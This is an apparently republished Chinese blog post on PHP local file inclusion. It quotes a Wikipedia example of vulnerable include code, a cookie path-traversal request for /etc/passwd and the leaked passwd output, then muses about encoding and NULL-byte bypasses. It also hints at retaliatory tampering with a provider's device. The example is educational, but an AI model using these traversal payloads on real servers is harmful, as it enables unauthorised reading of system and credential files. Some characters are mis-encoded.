那么請允許我犯懶,摘取Wiki的幾個例子:
$template = 'red.php';
if (isset($_COOKIE['TEMPLATE']))
$template = $_COOKIE['TEMPLATE'];
include ("/home/users/phpguru/templates/" . $template);
?>
那么一般來說就可以在Cookie做手腳(當(dāng)然這是數(shù)次測試之后才能推測的path):
GET /vulnerable.php HTTP/1.0
Cookie: TEMPLATE=../../../../../../../../../etc/passwd
然后服務(wù)器乖乖的給了回答:
HTTP/1.0 200 OK
Content-Type: text/html
Server: Apache
root:fi3sED95ibqR6:0:1:System Operator:/:/bin/ksh
daemon:*:1:1::/tmp:
phpguru:f8fk3j1OIf31.:182:100:Developer:/home/users/phpguru/:/bin/csh
是否可以繼續(xù)利用轉(zhuǎn)譯呢,%2e%2e%2f -->?"../" ?
include($_GET['file'] . '.html');
... ...
?>
這種保護(hù)是否可以加個NULL+轉(zhuǎn)譯什么的跳過去?
如果httpd是Apache這類指定Document root的程序,那么match之后再加 ../ 可能發(fā)生什么?
是否可以直接執(zhí)行命令?
我不知道耶!
OWASP有一個cheatsheet。可以看看。
近日看見友人談到什么執(zhí)照的民間反映時重提時這個東西,說好像SP有什么自己的IT Security Auditing,還號召各位自律、不要對什么過分行為作出過分的反映,以暴制暴世所不容……這個時候,我恰巧買了個電視盒子,而且網(wǎng)關(guān)是我自建的……你明白什么了?我可什么沒說耶!
某些人會說,不需要保證業(yè)務(wù)穩(wěn)定運(yùn)行、不擔(dān)心機(jī)密外泄、不怕出丑而損失企業(yè)無形資產(chǎn)、只顧忌所謂上級資源(能騙錢就行了)、不需要保護(hù)用戶資料、不怕微博轉(zhuǎn)發(fā)500次、有水軍幫忙給好評、有關(guān)系給刪帖……
……IT安全真不是啥事,不就是某些人用來向上級騙錢的么?錢到手怎么做真是無所謂的。
相比之下,安全不是問題,人是更嚴(yán)重的問題?。?/p>
因篇幅問題不能全部顯示,請點(diǎn)此查看更多更全內(nèi)容
Copyright ? 2019- 91gzw.com 版權(quán)所有 湘ICP備2023023988號-2
違法及侵權(quán)請聯(lián)系:TEL:199 1889 7713 E-MAIL:2724546146@qq.com
本站由北京市萬商天勤律師事務(wù)所王興未律師提供法律服務(wù)